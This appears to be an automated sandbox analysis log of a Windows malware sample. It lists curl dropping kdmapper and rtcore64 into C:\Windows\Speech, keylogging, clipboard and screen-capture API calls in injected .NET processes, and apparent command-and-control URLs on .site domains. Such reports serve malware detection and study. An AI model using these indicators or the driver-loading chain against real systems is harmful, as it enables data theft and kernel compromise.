Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/apiN
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.000000000090C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/api
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49733 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 47_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

47_2_004382A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 47_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

47_2_004382A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 47_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

47_2_00438E3C

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Code function: 0_2_00007FF60C47E550 SetConsoleTitleA,GetConsoleWindow,ShowWindow,system,SetConsoleTitleW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,CreateThread,SleepEx,CreateThread,CreateThread,GetConsoleWindow,ShowWindow,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,Beep,GetConsoleWindow,ShowWindow,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,

0_2_00007FF60C47E550

Source: taskkill.exe	Process created: 199
Source: cmd.exe	Process created: 248

System Summary

PE file contains section with special chars

Source: rtcore64.exe.55.dr

Static PE information: section name: ZhxHw+

PE file has nameless sections

Source: rtcore64.exe.55.dr

Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Speech\rtcore64.exe

Code function: 65_2_6D05A240 GetModuleHandleW,NtQueryInformationProcess,

65_2_6D05A240

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

52_2_00EC6FAA

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\imxyvi.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\rtcore64.exe

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47C5A7	0_2_00007FF60C47C5A7
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47E550	0_2_00007FF60C47E550
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C476A30	0_2_00007FF60C476A30
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4819F0	0_2_00007FF60C4819F0
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47B6D0	0_2_00007FF60C47B6D0
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4781AE	0_2_00007FF60C4781AE
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C472C10	0_2_00007FF60C472C10
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C471000	0_2_00007FF60C471000
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4751C0	0_2_00007FF60C4751C0
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4791BE	0_2_00007FF60C4791BE
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C473680	0_2_00007FF60C473680
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4824B0	0_2_00007FF60C4824B0
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47783E	0_2_00007FF60C47783E
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47A43E	0_2_00007FF60C47A43E
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C47B26E	0_2_00007FF60C47B26E
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C482858	0_2_00007FF60C482858
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C475EE0	0_2_00007FF60C475EE0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9520640	28_2_00007FF6A9520640
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A95236E0	28_2_00007FF6A95236E0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9524580	28_2_00007FF6A9524580
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9519150	28_2_00007FF6A9519150
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9539A20	28_2_00007FF6A9539A20
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9535A00	28_2_00007FF6A9535A00
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A95259E3	28_2_00007FF6A95259E3
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A95134B0	28_2_00007FF6A95134B0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953A518	28_2_00007FF6A953A518
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A951D3A0	28_2_00007FF6A951D3A0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A95143E0	28_2_00007FF6A95143E0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A95273E3	28_2_00007FF6A95273E3
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9514640	28_2_00007FF6A9514640
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9517EC0	28_2_00007FF6A9517EC0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A9533080	28_2_00007FF6A9533080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00438040	47_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042C070	47_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00449070	47_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00401000	47_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040B0E0	47_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040C080	47_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042D150	47_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004491F0	47_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0041F193	47_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00409240	47_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042C243	47_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004492F0	47_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0043E2A0	47_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004012B3	47_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00401359	47_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00416361	47_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042D3CC	47_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004493D0	47_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004483B0	47_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004113BD	47_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00405460	47_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00447429	47_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004094D7	47_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040A4E0	47_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042B490	47_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004074B0	47_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040B570	47_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004366E0	47_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0041D6A0	47_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00449700	47_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004117C0	47_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042F7DB	47_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00408850	47_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00403890	47_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0044A8B0	47_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_004488B0	47_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00436970	47_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0045392E	47_2_0045392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0041399C	47_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040AA00	47_2_0040AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00427AFB	47_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042BC50	47_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00413CC6	47_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042CCDD	47_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0042CCF5	47_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00429DF2	47_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00437D90	47_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_0040CE00	47_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00431E00	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00415EF6	47_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00407EB0	47_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00427F62	47_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00443FA0	47_2_00443FA0
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EC848E	52_2_00EC848E
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EC40FE	52_2_00EC40FE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED00B7	52_2_00ED00B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED4088	52_2_00ED4088
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EE51C9	52_2_00EE51C9
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED7153	52_2_00ED7153
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EC32F7	52_2_00EC32F7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED62CA	52_2_00ED62CA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED43BF	52_2_00ED43BF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECF461	52_2_00ECF461
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EED440	52_2_00EED440
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECC426	52_2_00ECC426
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED77EF	52_2_00ED77EF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EED8EE	52_2_00EED8EE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EC286B	52_2_00EC286B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EF19F4	52_2_00EF19F4
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECE9B7	52_2_00ECE9B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED6CDC	52_2_00ED6CDC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ED3E0B	52_2_00ED3E0B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECEFE2	52_2_00ECEFE2
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EE4F9A	52_2_00EE4F9A
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D0580F0	65_2_6D0580F0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D05AB60	65_2_6D05AB60
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D05A240	65_2_6D05A240
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D053500	65_2_6D053500
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D066900	65_2_6D066900
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D063120	65_2_6D063120
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D06BD20	65_2_6D06BD20
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D059530	65_2_6D059530
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D063950	65_2_6D063950
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D063570	65_2_6D063570
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D067180	65_2_6D067180
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D065590	65_2_6D065590
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D068DA0	65_2_6D068DA0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D057DC0	65_2_6D057DC0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D0679C0	65_2_6D0679C0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D064C20	65_2_6D064C20
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D05A850	65_2_6D05A850
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D063CC0	65_2_6D063CC0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D0664D0	65_2_6D0664D0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D06B8F0	65_2_6D06B8F0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D065740	65_2_6D065740
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D068340	65_2_6D068340
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D062340	65_2_6D062340
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D066BB0	65_2_6D066BB0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D064FB0	65_2_6D064FB0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D0697E0	65_2_6D0697E0
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D064230	65_2_6D064230
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D062640	65_2_6D062640
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D069640	65_2_6D069640
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D078E55	65_2_6D078E55
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D061660	65_2_6D061660
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D053AD0	65_2_6D053AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003901A0	73_2_003901A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00387020	73_2_00387020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00381000	73_2_00381000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C80A0	73_2_003C80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0039508C	73_2_0039508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003A21A0	73_2_003A21A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038C210	73_2_0038C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B8210	73_2_003B8210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038B270	73_2_0038B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C4240	73_2_003C4240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AD295	73_2_003AD295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003812F2	73_2_003812F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C32E0	73_2_003C32E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00385320	73_2_00385320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038937E	73_2_0038937E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AA3A8	73_2_003AA3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00381392	73_2_00381392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003873D0	73_2_003873D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003A8472	73_2_003A8472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AD4D4	73_2_003AD4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AC510	73_2_003AC510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B0590	73_2_003B0590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038158E	73_2_0038158E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B65E0	73_2_003B65E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B1670	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038A680	73_2_0038A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AC6E1	73_2_003AC6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C86E0	73_2_003C86E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038B700	73_2_0038B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00388770	73_2_00388770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00383780	73_2_00383780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AB830	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B6820	73_2_003B6820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003BF8E0	73_2_003BF8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AE927	73_2_003AE927
